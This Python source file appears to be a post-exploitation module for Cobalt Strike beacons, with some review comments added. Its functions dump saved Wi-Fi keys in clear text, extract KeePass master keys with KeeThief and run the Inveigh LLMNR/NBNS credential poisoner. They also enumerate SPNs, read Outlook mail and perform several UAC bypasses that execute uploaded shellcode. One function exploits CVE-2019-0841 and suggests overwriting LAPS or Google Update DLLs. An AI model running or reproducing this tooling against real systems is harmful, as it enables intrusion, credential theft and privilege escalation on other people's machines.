def _(bid, profile):
    """
    Export the named Wi-Fi profile on beacon `bid` with `key=clear`, print the
    key-related lines of the resulting XML, then delete the export.

    :param bid: beacon id passed to aggressor.bpowerpick
    :param profile: Wi-Fi profile name; spliced into the script with
        str.format and no quoting or escaping
    """
    # NOTE(review): the first script line ends with a stray `'`, which opens an
    # unterminated single-quoted string in PowerShell — the script likely fails
    # to parse; compare the same export in the `profile=None` variant below.
    # NOTE(review): `$profile` is never assigned in this script; in a normal
    # PowerShell host it is the automatic variable holding the profile-script
    # path, so `rm` would receive that path as an extra target — confirm on a
    # test host. `$env:temp:\*` also looks malformed (`:\` after the variable).
    command = """
netsh wlan export profile name="{name}" folder=$env:temp key=clear'
get-content $env:temp:\*{name}*.xml  | select-string -pattern '(keyMaterial)|(keyType)'
rm $profile $env:temp:\*{name}*.xml 
""".format(name=profile)
    aggressor.bpowerpick(bid, command)
def run(bid, program, args=None, silent=False):
    """
    Dispatch `program` on beacon `bid` through one of the module-level tables
    `assemblies`, `powershell` or `callbacks` (checked in that order; none of
    them is defined in this block).

    :param bid: beacon id passed through to the aggressor calls
    :param program: key looked up in the dispatch tables
    :param args: arguments for the program; None or empty becomes []
    :param silent: when False the assembly branch announces the task with
        btask; the PowerShell branch ignores it; the callback branch forwards it
    :raises RuntimeError: when `program` is in none of the tables
    """
    # no args
    if not args:
        args = []

    if program in assemblies:
        assembly = assemblies[program]
        # helpers.eaq: project helper; presumably quotes/joins the argument
        # list for execute-assembly — confirm
        args = helpers.eaq(args)

        if not silent:
            aggressor.btask(bid,
                            'Tasked beacon to run {} {}'.format(program, args))
        # the assembly itself is always run silently; the btask above is the
        # only console announcement
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)

        if isinstance(args, list) or isinstance(args, tuple):
            args = ' '.join(powershell_quote(args))

        # NOTE(review): by this point `args` is a str (joined above, or a
        # string supplied by the caller), so ' '.join(args) re-joins its
        # characters with spaces ("a b" -> "a   b") — presumably unintended.
        aggressor.bpowerpick(bid, ' '.join(args))
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))
def _(bid):
    """
    List `$env:localappdata` and `$env:appdata` on beacon `bid` via PowerPick.

    The script is assembled line by line; the result equals the dedented
    triple-quoted form (leading newline, two `ls` lines, trailing newline).
    """
    lines = ['', 'ls $env:localappdata', 'ls $env:appdata', '']
    script = '\n'.join(lines)

    aggressor.bpowerpick(bid, script)
def _(bid, runtime=99999, *args):
    """
    Import the bundled Inveigh.ps1 on beacon `bid` and invoke it with the
    fixed switches shown below.

    :param bid: beacon id
    :param runtime: value passed to `-RunTime`; note it is the first
        positional argument after `bid`, ahead of `*args`
    :param args: extra tokens appended verbatim (space-joined, unquoted) to
        the Invoke-Inveigh command line
    """
    script = utils.basedir('powershell/Inveigh/Inveigh.ps1')
    aggressor.bpowershell_import(bid, script)

    extra = ' '.join(args)
    invocation = ("Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 "
                  "-LLMNR Y -NBNS Y -StatusOutput Y {}").format(runtime, extra)
    aggressor.bpowerpick(bid, invocation)
def _(bid):
    """
    Show the OS caption and the installed hotfixes (`wmic qfe`) on beacon
    `bid` via PowerPick.

    The script text is identical to the original triple-quoted literal:
    a leading newline, two command lines, a trailing newline.
    """
    script = '\n'.join(['', 'wmic os get Caption /value | more', 'wmic qfe', ''])

    aggressor.bpowerpick(bid, script)
def _(bid):
    """
    List the Desktop, Documents and Downloads folders under `$env:userprofile`
    on beacon `bid`, one `ls` per line, via PowerPick.
    """
    folders = ('Desktop', 'Documents', 'Downloads')
    # one newline-terminated `ls` line per folder, in the order given
    script = ''.join('ls $env:userprofile\\' + name + '\n' for name in folders)

    aggressor.bpowerpick(bid, script)
def _(bid):
    """
    List `$env:localappdata` and `$env:appdata` on beacon `bid` via PowerPick.

    The raw text handed to helpers.code_string (a project helper; presumably
    it strips the indentation) is spelled out with explicit newlines and the
    original eight-space margin so the input is byte-identical.
    """
    script = helpers.code_string(
        '\n'
        '        ls $env:localappdata\n'
        '        ls $env:appdata\n'
        '        ')

    aggressor.bpowerpick(bid, script)
def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.

    :param bid: beacon id
    :param shellcode: passed to helpers.upload_to in the same position as the
        two local helper binaries, so presumably a local file path — confirm
    """
    # No return value: every step below is an aggressor/helper side effect.

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    # local helper binaries bundled with the project
    execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
    execute_assembly = utils.basedir('tools/execute_assembly.exe')
    # remote destinations under the beacon's temp directory; guess_temp is
    # queried once per path (presumably deterministic per bid — confirm)
    stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
    stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    package = r'{}\nuget.package'.format(helpers.guess_temp(bid))

    helpers.upload_to(bid, execute_assembly, stage1)
    helpers.upload_to(bid, execute_shellcode, stage2)
    helpers.upload_to(bid, shellcode, package)

    # Only stage2 appears on the command line; stage1 and package are uploaded
    # but not referenced here, so presumably the PowerShell module or stage2
    # finds them by their fixed names — confirm before relying on it.
    command = 'Invoke-TokenDuplication -Binary {}'.format(
        powershell_quote(stage2))
    aggressor.bpowerpick(bid, command)

    # remove all three uploads; the brm tasks are queued right after the pick
    aggressor.brm(bid, stage1)
    aggressor.brm(bid, stage2)
    aggressor.brm(bid, package)
def _(bid):
    """
    Announce a patch-status task on beacon `bid`, then run `wmic os get
    Caption` and `wmic qfe` silently via PowerPick.

    The script equals the dedented triple-quoted form: leading newline, two
    command lines, trailing newline.
    """
    script = '\n'.join(['', 'wmic os get Caption /value | more', 'wmic qfe', ''])

    aggressor.btask(bid, 'Tasked beacon to get patch status')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """
    Announce the task, then list Desktop, Documents, Downloads and Favorites
    under `$env:userprofile` on beacon `bid` silently via PowerPick.
    """
    folders = ('Desktop', 'Documents', 'Downloads', 'Favorites')
    # one newline-terminated `ls` line per folder, in the order given
    script = ''.join('ls $env:userprofile\\' + name + '\n' for name in folders)

    aggressor.btask(bid, 'Tasked beacon to show common document folders')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """
    Announce the task, then list `$env:localappdata` and `$env:appdata` on
    beacon `bid` silently via PowerPick.

    The script equals the dedented triple-quoted form: leading newline, two
    `ls` lines, trailing newline.
    """
    lines = ['', 'ls $env:localappdata', 'ls $env:appdata', '']
    script = '\n'.join(lines)

    aggressor.btask(bid, 'Tasked beacon to show AppData')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, *args):
    """
    `outlook` command: build a PowerShell pipeline over an Outlook folder from
    the parsed options and run it on beacon `bid` via PowerPick.

    :param bid: beacon id; also handed to helpers.ArgumentParser
    :param args: raw command tokens; rebound below to the parsed Namespace
    """
    parser = helpers.ArgumentParser(bid=bid, prog='outlook')
    parser.add_argument('-f', '--folder', help='Folder name to grab')
    parser.add_argument('-s', '--subject', help='Match subject line (glob)')
    parser.add_argument('-t',
                        '--top',
                        metavar='N',
                        type=int,
                        help='Only show top N results')
    parser.add_argument('-d',
                        '--dump',
                        action='store_true',
                        help='Get full dump')
    parser.add_argument('-o', '--out', help='Output file')
    try:
        args = parser.parse_args(args)
    except:
        # NOTE(review): bare except also swallows SystemExit and
        # KeyboardInterrupt; presumably helpers.ArgumentParser reports the
        # usage error itself before this return — confirm
        return

    command = ''
    # `outlook` is a module-level helper not shown here; presumably it emits
    # the COM prelude that defines `$namespace` and `$folders` — confirm
    command += outlook()

    # -f/--folder
    if args.folder:
        # specified folder
        #folder = args.folder.lstrip('\\')
        # NOTE(review): `folder` is not defined anywhere in this function (the
        # parsed value is `args.folder`), so this branch raises NameError.
        command += helpers.code_string(r"""
            $folder = $namespace.Folders.Item("{}")
            """.format(folder))
    else:
        # inbox
        command += helpers.code_string(r"""
            $folder = $namespace.getDefaultFolder($folders::olFolderInBox)
            """)

    command += helpers.code_string(r"""
        $folder.items""")

    # -s/--subject
    # the subject glob is spliced into the double-quoted -Like operand as-is
    if args.subject:
        command += ' | Where-Object {{$_.Subject -Like "{}"}}'.format(
            args.subject)

    # -t/--top
    # `if args.top` means --top 0 is treated as "not given"
    if args.top:
        command += ' | select -First {}'.format(args.top)

    # -d/--dump
    if not args.dump:
        # print summary only
        #command += ' | Format-Table -AutoSize Subject, ReceivedTime, SenderName, SenderEmailAddress'
        command += ' | Select-Object -Property Subject, ReceivedTime, SenderName, SenderEmailAddress'

    # -o/--out
    # redirection target is inserted without powershell_quote (unlike the
    # other commands in this file that take an `out` path)
    if args.out:
        command += ' > {}'.format(args.out)

    aggressor.bpowerpick(bid, command)
def _(bid):
    """
    Print every environment variable of the beacon process as a sorted
    Name/Value table on beacon `bid` via PowerPick.

    The text handed to helpers.code_string (project helper; presumably strips
    the margin) is spelled out with explicit newlines and the original
    indentation so the input is byte-identical.
    """
    script = helpers.code_string(
        '\n'
        '        Get-Childitem -path env:* |\n'
        '            Select-Object Name, Value |\n'
        '            Sort-Object name |\n'
        '            Format-Table -Auto\n'
        '        ')

    aggressor.bpowerpick(bid, script)
def _(bid):
    """
    Announce the task, then list processes that own a main window (id, name,
    title) on beacon `bid` silently via PowerPick.

    The text handed to helpers.code_string keeps the original four-space
    margin so the input is byte-identical.
    """
    script = helpers.code_string(
        '\n'
        '    Get-Process |\n'
        '        Where { $_.mainWindowTitle } |\n'
        '        Format-Table id,name,mainwindowtitle -AutoSize\n'
        '    ')

    aggressor.btask(bid, 'Tasked beacon to list open windows')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, *command):
    """
    Space-join `command` and run it on beacon `bid`, preferring the saved
    original implementation in the module-level `_old_bpowerpick` when it is
    set (truthy) and falling back to aggressor.bpowerpick otherwise.

    :param bid: beacon id
    :param command: command tokens, joined with single spaces
    """
    global _old_bpowerpick

    line = ' '.join(command)

    # `or` short-circuits, so aggressor.bpowerpick is only looked up when the
    # saved hook is unset — same as the original if/else
    target = _old_bpowerpick or aggressor.bpowerpick
    target(bid, line)
def _(bid):
    """
    Print DisplayName and InstallDate of the entries under the Wow6432Node
    Uninstall key, sorted by name, on beacon `bid` via PowerPick.

    The script equals the dedented raw triple-quoted form: leading newline,
    four pipeline lines, trailing newline.
    """
    lines = [
        '',
        r'Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |',
        'Select-Object DisplayName, InstallDate |',
        'Sort-Object -Property DisplayName |',
        'Format-Table -AutoSize',
        '',
    ]
    script = '\n'.join(lines)

    aggressor.bpowerpick(bid, script)
def _(bid):
    """
    Import KeePassconfig.ps1 and run Find-KeePassconfig, then import
    KeeThief.ps1 and run `Get-KeePassDatabaseKey -Verbose`, on beacon `bid`.

    Each (script, cmdlet) pair is imported and invoked in order.
    """
    steps = (
        ('powershell/KeePassconfig.ps1', "Find-KeePassconfig"),
        ('powershell/KeeThief.ps1', "Get-KeePassDatabaseKey -Verbose"),
    )

    for script, cmdlet in steps:
        aggressor.bpowershell_import(bid, utils.basedir(script))
        aggressor.bpowerpick(bid, cmdlet)
def _(bid, pattern, out=None):
    """
    Run `Get-IndexedFiles <pattern>` on beacon `bid` after importing the host
    recon module (import_host_recon is a module-level helper not shown here).

    :param bid: beacon id
    :param pattern: search pattern, quoted with powershell_quote
    :param out: optional output path; when truthy the command is redirected
        to it (also quoted)
    """
    import_host_recon(bid)

    parts = ['Get-IndexedFiles {}'.format(powershell_quote(pattern))]
    if out:
        # output to file
        parts.append(' > {}'.format(powershell_quote(out)))

    aggressor.bpowerpick(bid, ''.join(parts))
def elevate_slui_command(bid, command):
    """
    Elevate with slui bypass.

    Imports the bundled FilelessUACBypass.ps1 on beacon `bid`, then invokes
    Invoke-SluiBypass with `command` (quoted with powershell_quote).

    :param bid: beacon id
    :param command: command string passed as the -Command argument
    """
    bypass_script = utils.basedir('modules/FilelessUACBypass.ps1')
    aggressor.bpowershell_import(bid, bypass_script)

    invocation = 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def _(bid):
    """
    Announce the task, then print every environment variable of the beacon
    process as a sorted Name/Value table on beacon `bid` silently via
    PowerPick.

    The script equals the dedented raw triple-quoted form; the nested
    pipeline lines keep their extra four-space indent.
    """
    lines = [
        '',
        'Get-Childitem -path env:* |',
        '    Select-Object Name, Value |',
        '    Sort-Object name |',
        '    Format-Table -Auto',
        '',
    ]
    script = '\n'.join(lines)

    aggressor.btask(bid, 'Tasked beacon to get environmental variables')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, *dirs):
    """
    Recursively list each directory in `dirs` on beacon `bid` via PowerPick;
    with no arguments the current directory (`.`) is listed.

    :param bid: beacon id
    :param dirs: directory paths, each spliced into double quotes as-is
    """
    # default dir is .
    targets = dirs if dirs else ['.']

    # one newline-terminated Get-ChildItem line per directory
    lines = ['Get-ChildItem -Recurse "{}"\n'.format(path) for path in targets]

    aggressor.bpowerpick(bid, ''.join(lines))
def _(bid, *dirs):
    """
    `rmr` command: recursively force-remove each directory in `dirs` on beacon
    `bid` via PowerPick. With no arguments an error is reported and nothing is
    tasked.

    :param bid: beacon id
    :param dirs: directory paths, each spliced into double quotes as-is
    """
    if not dirs:
        aggressor.berror('rmr: specify some directories to kill')
        return

    # one newline-terminated Remove-Item line per directory
    lines = ['Remove-Item -Recurse -Force "{}"\n'.format(path) for path in dirs]

    aggressor.bpowerpick(bid, ''.join(lines))
def _(bid, out=None):
    """
    Import the bundled UserSPN.ps1 and run Get-AccountSPNs on beacon `bid`.

    :param bid: beacon id
    :param out: optional output path; when truthy the command is redirected
        to it (quoted with powershell_quote)
    """
    aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))

    parts = ['Get-AccountSPNs']
    if out:
        # output to file
        parts.append(' > {}'.format(powershell_quote(out)))

    aggressor.bpowerpick(bid, ''.join(parts))
def elevate_wscript_command(bid, command):
    """
    Elevate with wscript bypass.

    Imports the bundled Invoke-WScriptBypassUAC.ps1 on beacon `bid`, then
    invokes Invoke-WScriptBypassUAC with `command` as its -payload (quoted
    with powershell_quote).

    :param bid: beacon id
    :param command: command string passed as the -payload argument
    """
    bypass_script = utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')
    aggressor.bpowershell_import(bid, bypass_script)

    invocation = 'Invoke-WScriptBypassUAC -payload {}'.format(
        powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def elevate_eventvwr_command(bid, command):
    """
    Elevate with eventvwr bypass.

    Imports the bundled Invoke-EventVwrBypass.ps1 on beacon `bid`, then
    invokes Invoke-EventVwrBypass with `command` (quoted with
    powershell_quote).

    :param bid: beacon id
    :param command: command string passed as the -Command argument
    """
    bypass_script = utils.basedir('modules/Invoke-EventVwrBypass.ps1')
    aggressor.bpowershell_import(bid, bypass_script)

    invocation = 'Invoke-EventVwrBypass -Command {}'.format(
        powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def elevate_cve_2019_0841(bid, target, overwrite=None):
    r"""
    Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
    overwrite 'target' with 'overwrite'.

    Good overwrite options:
      - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
      - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)

    :param bid: beacon id
    :param target: remote path whose ACL is changed; passed through
        powershell_quote before being spliced into the script
    :param overwrite: optional local file; when truthy it is uploaded over
        `target` after the script has run
    """

    native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
    # Both fragments are spliced into the script verbatim (not quoted); the
    # wildcard is expanded on the beacon side by Resolve-Path.
    edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
    settings_dat = r'\Settings\settings.dat'

    # The literal is formatted with str.format, so every PowerShell brace is
    # doubled ({{ }}) to survive as a single brace in the script.
    command = helpers.code_string(r"""
        # Stop Edge
        echo "[.] Stopping Edge"
        $process = Get-Process -Name MicrosoftEdge 2>$null
        if ($process) {{
            $process | Stop-Process
        }}
        sleep 3
        
        # Hardlink
        $edge_dir = Resolve-Path {edge_dir}
        $settings_dat = $edge_dir.Path + '{settings_dat}'
        echo "[.] Making Hardlink from $settings_dat to {target}"
        rm $settings_dat
        Native-HardLink -Verbose -Link $settings_dat -Target {target}
        
        # Start Edge
        echo "[.] Starting Edge"
        Start Microsoft-Edge:
        sleep 3
        
        # Stop it again
        echo "[.] Stopping Edge"
        $process = Get-Process -Name MicrosoftEdge 2>$null
        if ($process) {{
            $process | Stop-Process
        }}

        echo "[+] All Finished!"
        echo "[.] New ACLs:"
        Get-Acl {target} | Format-List
        """.format(edge_dir=edge_dir,
                   settings_dat=settings_dat,
                   target=powershell_quote(target)))

    # the script relies on Native-HardLink, so the import precedes the pick;
    # both are tasked silently
    aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
    aggressor.bpowerpick(bid, command, silent=True)

    if overwrite:
        helpers.upload_to(bid, overwrite, target)
        # project helper applied to the overwritten file; its semantics are
        # not visible here
        helpers.explorer_stomp(bid, target)
def _(bid):
    """
    Announce the task, then report whether the beacon's current identity is
    in the local Administrators role, on beacon `bid` silently via PowerPick.

    The text handed to helpers.code_string is written with explicit newlines
    and the original indentation so the input is byte-identical.
    """
    script = helpers.code_string(
        '\n'
        '        if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {\n'
        '            echo "User is a local admin!";\n'
        '        } else {\n'
        '            echo "User is not local admin :(";\n'
        '        }\n'
        '        ')

    aggressor.btask(bid, 'Tasked beacon to check if user is a local admin')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """
    Announce the task, then report whether the host is domain-joined
    (Win32_ComputerSystem.PartOfDomain) and print `$env:userdomain` when it
    is, on beacon `bid` silently via PowerPick.

    The text handed to helpers.code_string is written with explicit newlines
    and the original indentation so the input is byte-identical.
    """
    script = helpers.code_string(
        '\n'
        '        If ((gwmi win32_computersystem).partofdomain){\n'
        '            Write-Output "User is in domain: $env:userdomain"\n'
        '        } Else {\n'
        '            Write-Output "User is not in a domain"\n'
        '        }\n'
        '        ')

    aggressor.btask(bid, "Tasked beacon to check if it's in a domain")
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, profile=None):
    """
    Show saved Wi-Fi profiles on beacon `bid`.

    :param bid: beacon id
    :param profile: when given, that profile is exported with `key=clear`,
        printed and the export deleted (via PowerPick); the name is spliced
        into the script with str.format and no quoting. When None, a plain
        `netsh wlan show profiles` is run through bshell instead.
    """
    if profile:
        # NOTE(review): `$profile` is PowerShell's automatic variable for the
        # profile-script path; assigning it here shadows it for this script
        # only, so the later `rm $profile` removes the exported XML. The
        # `$env:temp:\*` path (`:\` right after the variable) looks malformed
        # — confirm on a test host.
        command = helpers.code_string("""
            netsh wlan export profile name="{name}" folder=$env:temp key=clear
            $profile = $env:temp:\*{name}*.xml 
            get-content $profile
            rm $profile
            """.format(name=profile))
        aggressor.bpowerpick(bid, command)
    else:
        # trailing `;` is a no-op in Python
        aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear');
def _(bid):
    """
    Announce the task, then print the OS caption and the installed hotfixes
    (Win32_QuickFixEngineering, newest first) on beacon `bid` silently via
    PowerPick.

    The text handed to helpers.code_string is written with explicit newlines
    and the original indentation so the input is byte-identical.
    """
    script = helpers.code_string(
        '\n'
        '        wmic os get Caption /value\n'
        '        Get-WmiObject -class Win32_quickfixengineering |\n'
        '            Select-Object HotFixID,Description,InstalledBy,InstalledOn |\n'
        '            Sort-Object InstalledOn -Descending |\n'
        '            Format-Table -Auto\n'
        '        ')

    aggressor.btask(bid, 'Tasked beacon to get patch info')
    aggressor.bpowerpick(bid, script, silent=True)